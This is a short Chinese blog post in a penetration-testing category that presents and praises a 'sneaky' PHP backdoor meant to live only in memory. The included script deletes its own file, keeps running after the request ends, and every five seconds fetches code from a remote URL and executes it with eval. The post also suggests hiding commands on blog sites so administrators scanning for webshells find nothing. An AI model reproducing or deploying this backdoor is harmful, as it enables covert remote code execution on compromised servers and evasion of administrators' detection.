猥琐流PHP内存驻留后门

渗透测试 2015-12-21 15:03 暂无评论

习科上一则帖子发出来的,确实能给人一种新的猥琐流。。。

代码稍微改改,就能舍弃以txt的方式来获取消息指令。例如写到QQ空间或者163博客等等一些网站内,后门每五秒会循环一次执行接收指令。

当管理员发现有问题时,扫描文件以及查马儿的时候根本就没有这个文件。。。因为它自身删除了,驻留在内存里。

读取远程文件的内容写入$code中当作字符串,进入死循环,每次循环后等待五秒继续运行。

但是有一个缺陷,在PHP重启后或者停止进程后,后门也随之消失了。

<?php
unlink($_SERVER['SCRIPT_FILENAME']); // 删除自身
ignore_user_abort(true); // 驻留进程,等待指令
set_time_limit(0); // 不关闭程序,保持连接
$remote_file = 'http://www.d0cs.org/shell.txt';
while($code = file_get_contents($remote_file)){ // 获取$remote_file的内容
  @eval($code);
  sleep(5);
};
?>
暂无评论